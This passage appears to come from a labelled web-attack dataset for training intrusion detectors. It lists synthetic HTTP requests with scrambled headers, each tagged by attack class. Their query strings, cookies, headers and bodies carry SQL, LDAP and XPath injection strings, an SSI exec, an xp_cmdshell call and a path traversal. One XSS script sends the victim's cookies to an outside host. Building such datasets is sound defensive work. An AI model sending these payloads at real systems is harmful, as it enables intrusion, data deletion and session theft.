If-Unmodified-Since: Sun, 17 Jul 05 10:57:07 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 11:48:48 GMT
Max-Forwards: 8888
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM d250am1tczV0OWVvZWVzU2ptY2pvaWFjZW5lY3NyaWE4Y2Fob2l1aG9sY2l0OQ==
Range: 186464-,-8
Referer: /eeecisa/rHa9ctcs/ooaaE/iLDsh4sr.css
TE: deflate
Trailer: Cache-Control
User-Agent: tsalfcrmui4tSedaoipl
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3095x7377
Via: tfyr/4.6 www.jCtaf.js, 0.4 www.zdjlrdQm.png
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49760
Start - Id: 39975
class: SSI
GET /agsugetew2p9qoAe4not/r5l-tFWKaO3kMUSP/eoctu1cmDntniogi/ps/rf/n-OQXXfnsFVyzf.kxq/Eeiuxtlznioehm.htm?t8t=4&ruatismbdsfbe=swbr&7ieyelSr6=andf9&5dkhdhlah=elorov&dihnnn=679&vfr=arSE+hOro%7Ew&KunionSAX5@RhGF=od&q4rtnmtiE=%3C%21+++%23%3C%21--++%23exec++cmd%3D%22id%22--%3E&iieeeW5W=2336175243&raIoof=uhXOoi8L8&egTHHoyheA=5455355 HTTP/1.0
Host: www.U9ko.net
Connection: uuda
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: t-Xr2vt3ki;q=0.2
Cache-Control: max-stale
Client-ip: 160.248.173.144
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="03"
Date: Fri, 11 Mar 05 21:57:20 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Fri, 18 Sep 09 03:37:33 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: *
If-None-Match: "K0tdW4yv_K7@OCCTKU"
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 4109
MIME-Version: 9.7
Pragma: 0e='tM'
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: iyadh rlvunwul=l4lu
Range: 75-
Referer: /i5dvn/ehtiiU.tar.gz
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 1.6; ii-dg; rv:3.0.7) Gecko/49454719
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39975
Start - Id: 42625
class: SqlInjection
GET /rnOOMvy.KYIBIsbsi@N/sVVC4H7cXiyYCg4i6jF/y@/az65/hfCstaTmob5i/E9s99t8rraMTw/sno8AaC3EGwoqNB44F7Q/3lBtkZ_2/etfa8st/uwT34bKRca.asmx?9Emr=iframenaccess_log&isodi=mynlRwd&etR=%27+++++OR+%27c2gev4tDda%27+++++%3C+++++%27X&qie8obtiti=9C%40 HTTP/1.1
Host: 181.181.138.200
Connection: keep-alive
Accept: video/*, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 124.196.83.104
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Sat, 01 May 04 12:35:13 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: rtu92t@o1zyqi1s.org
If-Modified-Since: Sat, 05 Apr 08 24:45:00 CET
If-Unmodified-Since: Thu, 19 Oct 06 22:39:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jun 05 23:28:37 CET
Max-Forwards: 66
MIME-Version: 1.2
Pragma: nx='q'
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: 1wlss grhl=0tlt
Range: 72326-9838
Referer: /riol1ea/tedisat.php4
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.4 (X11; U; Linux i386 6.4; gh-To; rv:3.0.8) Gecko/09980127
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: deflate
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42625
Start - Id: 37349
class: LdapInjection
GET /gUo90H8et5c8srptei/fIsezlhK/t5w5ql-tVAUI5d5.@wQG/aBujm0NGZA_yw06/eirInph7d/u663ZQAkflzlvBAL0Hso/oe1a0nenectosxrA/ijpqF3UUstjJ/iP6nUy39rBKWJB/eoa4IcapuAbeg/ftpdKaP/adgt4hn2elscr2ex.tiff?tat2eniiezaltr=rs4&ndMaa50anOz=h8hrsD&elS=g7ndme+loptijlbg&ba3el3=68774&ooOnrnvtNtNs=uao&SGallGY=punlibyO3endns&TGhcmdEi8N_i=eZpdq8vzJESc&tt2ntstdow9oPGr=6194784&HaD2-Yallj4o=Ixfie5so7phHk&6bgps0a=621&ebwlu=afntdocumentuftp HTTP/1.1
Host: www.ia1ef.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.7
Accept-Language: sc-Dvtd3ei, eu0Mmho-gDEuS5, f-tb;q=0.9, oh0s1-Eeo;q=0.0, htSm-b;q=0.3
Cache-Control: no-transform
Client-ip: 181.24.153.249
Cookie2: $Version="66"
Date: Sun, 10 Feb 08 15:07:44 UTC
ETag: W/"W7i6lnQqDbBMLy_yXF"
Expect: csleo=i1rom6b3
If-Modified-Since: Wed, 08 Jul 09 11:47:32 GMT
If-Unmodified-Since: Tue, 20 Nov 07 16:51:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8501
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: Basic THVzcjpxZmxwVGV3cg==
Referer: http://wtel.de/ibegof/i0iPoavt/sytoa9ep/mcvij/eiix.css
Trailer: If-None-Match
User-Agent: ohn)(&(objectClass   =  4rt*)
UA-Disp: 620,725,16
UA-Pixels: 5121x090
Via: HTTP/5.0 115.169.69.85, 7.2 www.lyohep3.jpeg:64276, 1.0 3.107.129.17:35908
Transfer-Encoding: compress
Upgrade: ii2/4.4, roa/1.5
X-Serial-Number: 3225774785
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37349
Start - Id: 48715
class: XPathInjection
GET /eiaoeowedahpote/RRkOAOcn/yonoYotdeec/LdYu/ht5rhn9bhse/hdreuHhmsaixidfs8b9e.png?ih3wAcw=mmCrhcwi%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++++%27eaot%27++%3D+%27 HTTP/1.1
Host: www.eFe4o.st
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-ce, iso-8859-9;q=0.4, iso-8859-15;q=0.4, iso-8859-2;q=0.7, iso-8859-8;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: venti-a, sr7Gaiht-s;q=0.6, n-o, 6h-usynessi, ftcn-Aeto;q=0.8
Client-ip: 14.52.89.216
Cookie: fiLrts4nr=Ohseianhlcv;Aedhritocpho=4;cewsmoeoh=n3a
Cookie2: $Version="7"
Expect: ekEMd3
If-Modified-Since: Wed, 24 Feb 10 05:17:23 CET
If-Unmodified-Since: Mon, 20 Oct 08 12:55:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 592
Range: 98467-277,778-,061140-824755
Referer: /huefr7ah/hjs7sii/e0ej7.swf
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 9.3; at-ie; rv:5.7.2) Gecko/96583677
Via: 8.4 www.pacmacwn.jpeg:36787
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
~~~~~: ~~~~~~~~~~

null

End - Id: 48715
Start - Id: 36402
class: OsCommanding
GET /iJFgDYBbAbB/teu2sck/teaed5/nVhtpassPQh/iJ27/TDcOG/rlBBTaFBbKtHKa-Uf8..asp?eoynatmnotaqted=d%3FGTtorbilsz%5Cf&pfsteema=tMKyLARDc&riehiwuwS=idrt&fiSd8eva1mpediN=5&dcehy=Nfu%5Ciandhdobjectntn%5DnB&hsiabsi6eaE=gTehunliaWcn&rhogsaLgtit25=10&4wtaneeuo=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&i4s89emeaTipo7=idteooeenpecgSI6&htnsteei2=tWN&hnt2wgr=nbetweendR&mdorEved=35602&ar=5d9hbss HTTP/1.1
Host: www.drtessosfa.fr
Connection: close
Accept: text/*;q=0.5, audio/x-wav
Accept-Charset: euc-cn;q=0.4, iso-8859-8-i
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.5
Cache-Control: min-fresh=88
Client-ip: 223.164.71.64
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Tue, 13 Jun 06 23:17:42 UTC
If-Match: *
If-None-Match: *
Referer: /eyfdic/eyeopWa/WisraSa.htm
TE: trailers,deflate
User-Agent: Mozilla/7.4 (compatible; nzq7ntaqee; WinNT; FBsta)
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
X-Serial-Number: 3132284615
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36402
Start - Id: 49998
class: XPathInjection
POST /gfkvsq-Cbb50RU0/tpIh96PFH8Jd6FAnN/cKzqMD0s/PFCLFAVservicesfzulikenvar/t9hens8brhaeihi.shtml? HTTP/1.0
Content-Length: 55
Content-Language: nee,2desesN,me4
Content-Encoding: deflate
Content-Location: /need0Ds/rldpm/oogp/elbfyfb.sh
Content-MD5: bmlyNlR0OWNwZWFJc25yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Jul 09 19:07:05 GMT
Last-Modified: Thu, 04 Feb 10 17:30:08 CET
Host: 163.170.253.47
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.3, compress;q=0.0, gzip;q=0.7, identity
Accept-Language: ruthmo-oieat;q=0.6, o8saAj-dWSd;q=0.7, L-vstolwlb;q=0.5, 7Th9T-ltezn
Cache-Control: no-store
Client-ip: 89.188.193.205
Cookie: ysrtt=eHpVXbFXm;5uovi8Sul1mChci=4;WNf9Oq7b3-C6=7
Cookie2: $Version="99"
Date: Wed, 28 Apr 04 14:44:24 UTC
ETag: "TUj8p7dHypWCUyG29"
Expect: ceuhtats
From: etjd@onalE.be
If-Modified-Since: Mon, 11 Oct 04 22:53:33 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: "4gT2GXKYQ3w0O0gIpCdX"
If-Range: Sun, 24 Sep 06 13:07:38 UTC
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Authorization: Basic dGFwcHMwdmQ6QXNkc2U5ag==
Range: -850,-93,-844
Referer: http://www.lernN.gov/aehajrdw/adcpco.exe
TE: deflate
User-Agent: thmR/thec/ste/child::node()[ position()=62]  |  tkot/rhrla/nnueG/child::text()[position()=5] or     'teZeeY7'=   '
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
Warning: 252 180.24.75.159 "hsne9Zmnmn5s" 
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

83o=bEnoA_lAHr1&wgetbESscriptbtd=hziNjo&tk=7&anustt=ptu

End - Id: 49998
Start - Id: 42477
class: SqlInjection
GET /ezrhZjmqa_UCUqvmmER/azUj@0IzH.shtml?naVon=isi%28o&KHYS42zhavingF=l6ndKG47.&sgrm14epere4att=s_ORmCNTj9&alhXo.QYdri=9shfe3Lm%27%29%3BDELETEFROMusersWHEREupper%28username%29++++%3D++upper%28+++%27admin&Hipashwnrw3imdc=+slees7mtfEsa HTTP/1.0
Host: 145.38.9.145
Connection: nnti
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.4, windows-1254, x-mac-arabic, ks_c_5601-1987, cp-936
Accept-Encoding: gzip, gzip;q=0.3
Accept-Language: Isleyoe-Etmt;q=0.1, 2Ukm3-ter;q=0.6
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: ehcfue=csrn
Cookie2: $Version="2"
Date: Thu, 20 Aug 09 18:20:16 UTC
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Thu, 10 Dec 09 19:59:50 GMT
If-Unmodified-Since: Mon, 18 Oct 04 21:41:00 CET
If-Match: "UlDPhJKra-i9UTFwv"
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 8834
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 7-59040
Referer: /rsleS8wr/tahl.mp3
TE: deflate;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: kmSE/0.6
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/5.4 183.214.192.178, FTP/8.1 www.heag.html
Transfer-Encoding: deflate
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42477
Start - Id: 45936
class: PathTransversal
GET /aQ7-0/rzwJORah1FZDpgY/aq.g-d/dKb-z.jpeg?ahrindtzbd=72sdueitpe&frrOttnzse=u8rcpt&R8jBkNyObU=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&tha=tde HTTP/1.0
Host: 31.13.123.70:26
Connection: tEpS
Accept: image/*, text/html;q=0.4, video/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=7458
Client-ip: 97.149.89.41
Cookie: autoexec4-LjxkMg=1@u59g5;atp0csbsitoc=l-RB@Od;ea=ufCecoqus3anze;Ti=97;o0oes=0;ft.ftp4U0az5=3120523
Cookie2: $Version="3"
Date: Thu, 22 Dec 05 21:39:22 CET
ETag: W/"ur2DNWLm99fcidgU4"
Expect: exbam=LrtehsF
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Sat, 08 Jan 05 12:21:44 CET
If-Unmodified-Since: Thu, 01 Apr 04 04:52:07 UTC
If-Match: "fm23g2-AwpNTYH5D04"
If-None-Match: "6dypoharvRJ@.WuDppP"
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 7656
MIME-Version: 2.6
Pragma: oahN7ly=f
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://e3wef.it/sEE2e/ytwiaaa/rueh/nobg/GaXngrse.php3
Trailer: Accept
User-Agent: visradAix (tZahM6ua)
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: nstsgn/3.1
Warning: 301 www.foehiLHu.gif "dqnsc" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45936
Start - Id: 49638
class: XPathInjection
GET /ersNeeisyl/-iRruNQnLmp3cservices/snllD5rofd3/hit/lcrsiefr5fnmeaUle/tq2tfmorihAlznn/opa/ts7GpetanE4Giy48ic/SaC1U31P/ae-/ipes9eh.cgi?laoXdanka=7&ctzOncerlnthNdy=1177&uol=iwherei+x&EtraNmak=tm&tnlliytblh=77404&obwseneiy=ucdbt%27++++or+++++6++++%3C++++count%28path%2Fchild%3A%3A*%29+++++or+%27ato%27%3D++%27&4c7rj=lvlge&2i7f41=522244860&kejwrrtoiaatIe=3t%24e%25i6pr&zieo9=490037017&6eaj=06021091 HTTP/1.0
Host: www.iehsa.fr:818
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8-r;q=0.0, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 168.133.90.250
Cookie: sl0htIx=t;einh9ke6tenht=ldop2tiframe4l;eae=uet\;EqRe=264832
Cookie2: $Version="94"
Date: Mon, 28 Apr 08 12:19:26 CET
ETag: W/"235Ird-L6KJI_ca"
Expect: roznzstA
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Sat, 05 May 07 16:23:39 CET
If-Unmodified-Since: Fri, 26 Dec 08 08:35:01 CET
If-Match: *
If-None-Match: "XmoKJgKIpAarrH53fUmW"
If-Range: "0fy946-0WLQMaM@N5I"
Max-Forwards: 2339
MIME-Version: 2.4
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: Buae mojX=Miuace
Range: 79860-827,72-9963,513431-
Referer: http://www.eyp6.com/oonebsp/aahirlu.nsf
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 4.2; ld-we; rv:3.4.5) Gecko/19428685
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6458x943
Via: 7.4 90.48.242.51, 2.4 www.N3mkxnrc.gif
Transfer-Encoding: gzip
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49638
Start - Id: 47167
class: XSS
GET /cEQr8/yx1rtedednrEstnehaa/e4kwUdije/exvIyK.Hyrxe16/5-.foBSqLe0S91W/JlbNWR/md_9H6/ZqF5DHEHliba1L-O/Ei/7cesmnCrVoR6h0hxn.cgi?yos8ge2asRewR=e-a&_C@3lEnulloYy1=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.atns.com%2Fcgi-bin%2Fntnsroeril.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&tnf3nttqhrws=30003&dzolV.1o=8tisl HTTP/1.1
Host: www.95nr.it:54241
Connection: fkeaye
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ufr-tctnn, tlnh9-8iht
Cache-Control: max-stale
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="4"
Date: Wed, 18 Aug 04 06:58:15 GMT
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: NVuaoa9@ley3kSmtv.uk
If-Modified-Since: Sat, 01 Mar 08 23:22:56 CET
If-Unmodified-Since: Sat, 03 Mar 07 22:27:38 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Nov 05 13:19:13 CET
Max-Forwards: 8797
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: thnnq aalau4n2=bieelze
Range: -016,1-,67332-47295
Referer: /2m4csq/2ma8Eaa/rshv.js
TE: trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 0.2; uo-hz; rv:5.0.2) Gecko/56632284
UA-CPU: MIPS
UA-Disp: 9157,127,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/9.4 216.133.229.192:20390
Transfer-Encoding: Auhl
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 218.81.85.0
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47167
Start - Id: 48458
class: XPathInjection
GET /nahduA8/Iqrdeo/efhegoeernsytecde/qhdsumtenosg/hanApfMntc1inawfh/a6o5Tky5Z0lxq/pttoiv5ojl77tl.mdb?Y.VtV=tgermoapLp&Erl=dXX3W HTTP/1.0
Host: 162.22.162.140
Connection: keep-alive
Accept: text/xml;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: vam-eanxu;q=0.4, ncaZc9i-a;q=0.9, eL-e, rgeiau-edl8, scpcgawo-r9
Cache-Control: only-if-cached
Client-ip: 62.130.69.26
Cookie: rda4t=(i     <   count(es/child::text())   and     j     <   count(vuaH/child::comment())   and  k < count(Enp/child::*)  );82EWqservices1Y=Ptseo
Cookie2: $Version="679"
Date: Mon, 05 Apr 04 01:49:37 UTC
ETag: "09URqOv6Cmd63CyBt4r"
Expect: edhi1
From: nuehal@ifkmfi.it
If-Modified-Since: Tue, 09 Dec 08 13:04:42 UTC
If-Unmodified-Since: Sat, 29 May 04 07:34:47 UTC
If-Match: "mvLUspU0-sn-uqhlg1A"
If-None-Match: "fw0kMMkwO@XjdPUP"
If-Range: Fri, 02 Sep 05 13:22:36 UTC
Max-Forwards: 01
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: Basic YWd3OGVuOnRoZW5tc24=
Range: 11-
Referer: http://EloreE.fr/ledOe.mpg
TE: deflate
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 9.3; ol-oo; rv:6.9.1) Gecko/21826571
UA-CPU: Sparc
UA-Disp: 3766,742,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2402x7254
Via: FTP/7.4 www.nadvr.shtml, 5.1 156.188.92.36:6588, 3.1 www.cnuqll.js
Transfer-Encoding: deflate
Upgrade: daft/8.1, resali/5.5, hne1/8.0
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 48458
Start - Id: 35143
class: SqlInjection
PUT /b_J7/bsditmihhoh/qyGMVZRdcBG/5g_L/l3QpCe/ymjYKrYEoErsvf2SJGFB/baeeusdrlijrbf.jpeg? HTTP/1.1
Content-Length: 119
Content-Language: aabq,nmcw
Content-Encoding: deflate
Content-Location: http://www.wSnarta1.st/tt4n8/6rsolhsi/Ndbq/Eioierht/tdsuqsnl.tiff
Content-MD5: aWxnb2FocEVmaXN0aW14bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Oct 05 23:49:39 CET
Last-Modified: Sat, 12 Jun 04 06:03:57 UTC
Host: www.hotsmaelr.org:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: max-age=1
Client-ip: 104.27.173.11
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="374"
Date: Mon, 04 Jul 05 01:45:25 CET
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Mon, 09 May 05 18:19:01 UTC
If-Match: "V@5-SiSROLbdAeh53"
If-None-Match: "xAeDUQ3e7hTvFHvOCvd"
If-Range: Tue, 22 Jun 04 10:44:19 UTC
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM bGFlM0hpYnN0Ymlkb3AzaDFlb2lvZnVjcm5Tbmxyc2FoYTZkbQ==
Range: 63-383,700-,-5
Referer: /ysst9oit.mdb
TE: trailers
User-Agent: Mozilla/8.6 (Machintosh; U; Mac OS X 0.6; hd-al; rv:9.4.6) Gecko/27645093
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 1.6 www.itil1zae.png
Transfer-Encoding: identity
Upgrade: pt5etn/1.8, Epd/4.6, nuba/1.0, kixdml/0.4, fecwi/7.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rR5pWGf=4547364&oi44osabimorf3S='     OR    'emmtspnue'   = N' &agaexewlWnt=6790705&.dP_TgRORf@d=execseAt  ea

End - Id: 35143
Start - Id: 41419
class: SqlInjection
PUT /tJMHU26v9/le/axms-XGH87Mf/eaegeTobhilee3Ie/s65rihi/tjeoya48steeetae7/0mnlhrd4mree62ntinhs/rinttcnhibsFiroaps/1kQHPRfv1vjnYFrQ4/mKBlg-/thmlZR2S39cegEYVn/ew2icxaaprsinvd.php? HTTP/1.1
Content-Length: 173
Content-Language: Ojteeiws
Content-Encoding: identity
Content-Location: http://xltl8.be/leaAs/pocyljbw/cencih/ltelh/siRrseet.pl
Content-MD5: aXNlb3JkSGNydG5yZGxlNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 20:23:14 CET
Last-Modified: Sat, 15 Mar 08 11:01:58 UTC
Host: 83.127.99.188
Connection: close
Accept: audio/basic;q=0.2, video/quicktime, text/html
Accept-Charset: windows-1252
Accept-Encoding: compress, gzip;q=0.0
Accept-Language: fjo9ao-riawnpRr
Cache-Control: max-age=87
Client-ip: 180.8.150.200
Cookie: usnoeenteae=st/=;u6fHm=tbr:
Cookie2: $Version="458"
Date: Sat, 09 Feb 08 13:11:11 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: 100-continue
From: eznB@Adtctleba.uk
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Thu, 11 Feb 10 04:25:01 UTC
If-Match: "FTba.-n9fS1b70R"
If-None-Match: "ovDEwK4quk4sKKVf"
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 1423
MIME-Version: 2.2
Pragma: 0ozao='ynh'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: otrr xiR66mil=vOls
Range: 4509-,62-022408,-4198
Referer: http://oyI4.uk/Lwuk/aefehe.php3
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: nOjoN@v http://www.tyxr2a.biz
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 738x118
Via: 9.1 www.6varh.shtml, 8.1 www.efeTsosP.jpg
Transfer-Encoding: lhcoit; rnhbbou=17oeeno6
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ts27sd1gSeT2mh=oblrtexecdr&oixt2sbroeSnwat=1a0stfne&nmdb5egbisaC= hc2tlLxt4rotpe&Fiudrsahc=847766&sW9ftentntu1=ym&50ivitts2rcitS='  /**/  OR /**/''  =    '

End - Id: 41419
Start - Id: 42011
class: SqlInjection
GET /n3otq/yns/nrsSe/Un1/ePLuVes/aeoAntsma/sJiFVl.S3nfhHirJuIY/wrrnmXKk.S2/eho1.msf?eLee=ea4IEXR&Dw8el5oeuNircjd=EporAhn%27+++%29%3B++DEL%2F**%2FETE++FROM+++++users+++WHERE+++++upper%28username%29+%3D+++++upper%28+%27admin&haenvgRaunsos=iShati%25lnam&de53=enthaacn&apiccoih=r%29%25Aue%7CsobHcmdili%7Ewi%2B%26&ZrYsea44eiowo=ahot&io2iylsqecpaLc=f HTTP/1.1
Host: 144.112.216.225
Connection: close
Accept: text/html;q=0.4, text/xml;q=0.3, application/*
Accept-Charset: *
